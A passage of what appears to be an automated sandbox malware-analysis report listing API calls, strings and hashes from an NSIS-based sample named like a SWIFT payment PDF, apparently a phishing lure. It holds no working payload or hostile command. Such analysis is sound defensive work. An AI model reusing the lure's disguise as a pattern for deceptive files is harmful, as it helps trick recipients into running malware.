                                                                                                                                    • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 1975747703-1115850852
                                                                                                                                    • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A
                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                    • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    • soft, xrefs: 00402EDC
                                                                                                                                    • Null, xrefs: 00402EE5
                                                                                                                                    • Error launching installer, xrefs: 00402E3E
                                                                                                                                    • (*B, xrefs: 00402E7C
                                                                                                                                    • Inst, xrefs: 00402ED3
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-2478819026
                                                                                                                                    • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-730719616
                                                                                                                                    • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
